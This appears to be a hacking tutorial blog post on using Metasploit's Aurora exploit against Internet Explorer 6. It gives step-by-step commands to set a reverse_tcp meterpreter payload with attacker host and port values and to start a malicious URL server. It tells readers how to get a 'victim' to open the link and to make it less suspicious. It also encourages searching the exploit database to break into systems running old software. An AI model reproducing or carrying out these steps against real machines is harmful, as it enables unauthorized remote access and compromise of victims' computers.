Aurora is a browser based exploit, which means that payload is injected through the browser on the victim machine. Aurora exploits a memory corruption flaw in Internet Explorer 6. It’s quite outdated, but we’re taking baby steps here and this one’s quite easy.
This very exploit was used in Operation Aurora by a group of hackers who compromised a large number of major computer systems, including Adobe. This attack started in mid-2009 and continued through December. Internet Explorer has a ridiculously long list of potential vulnerabilities, although most (if not all) of which have been fixed in today’s version. Every software will have its bad day at some point. The only way to avoid the fallout is to keep up with the news, maybe just peek the headlines and stay away from dangerous applications. Zero day exploits are known to be used by several hackers to setup zombie networks without the (potentially, thousands of) victims ever finding out.
IE 6 was released in 2001, to carry out this hack you may want to download the older version of IE.
Fire up Metasploit and let’s start by choosing aurora:
Next, set payload to reverse meterpreter.
»set payload windows/meterpreter/reverse_tcp
Now we need to input LHost, Lport (for Payload) and SrvHost for aurora. Lhost and SrvHost have to be the same. You can also change srvport, but you can leave it to 8080 (Default) if you want.
»Set LHost 192.168.2.103
»Set LPort 4444
»Set SrvHost 192.168.2.103
(The IP address used is just an example, you need to replace it with the address of your victim) We also have the option change uripath. What’s that? This exploit works by opening a URL in the old buggy IE6. Uripath gives us that URL, which when opened in our victim’s computer sets up a connection through the specified ports to us, giving us the meterpreter session.
The best way to practice these attacks and exploits is with a willing (and trustworthy) friend. You can also set up multiple virtual machines on your own system, but I think that overly complicates things, plus most average computers have a hard time running a single virtual machine with decent performance. If you have more than one computer, maybe a laptop you could try getting a LAN (Ethernet) cable and connect the two together. Again, the easiest way is two systems with known IP addresses connected to the internet.
We’re simply going to set the uripath to a slash character that will let metasploit come up with its own URL that we can use. It should be something like:
Changing the uripath to slash character, as below gives us a smaller URL. Doesn’t really matter, but it’s a tiny bit less suspicious.
»set uripath /
Type exploit, and our local server will start. That is, when the victim opens up the URL we send them, it connects them directly to our makeshift server. It won’t open anything in the victim’s browser, just a blank page but it establishes the connections and gives us the meterpreter session. Mission accomplished.
So, now we know another exploit, another way to break into our victim’s computer. In reality, we haven’t even scratched the surface yet. There are currently over 2500 different exploits included in Metasploit that we can use. The entire database is available at:
You can head over there and enter search queries to find different exploits. Suppose, that you know a system has an old version of a software, say Adobe Reader 9.1. You can type in ‘adobe reader 9.1’ in the search box and it will give you a list of all the exploits that you can use to exploit the faulty software to gain access to the computer. I recommend you try out as many as you can. Take a look at your own computer, see if you can find any exploitable application on your computer, maybe challenge a friend to find a new vulnerability on your system. In hacking, knowing the tricks of the trade involves getting used to the usual hacking process. What we’re doing is just that. Metasploit is an incredibly powerful tool with tons of features and options. The best way to learn a software is to press every button just to see what happens. So go ahead. Explore.
Recommended | All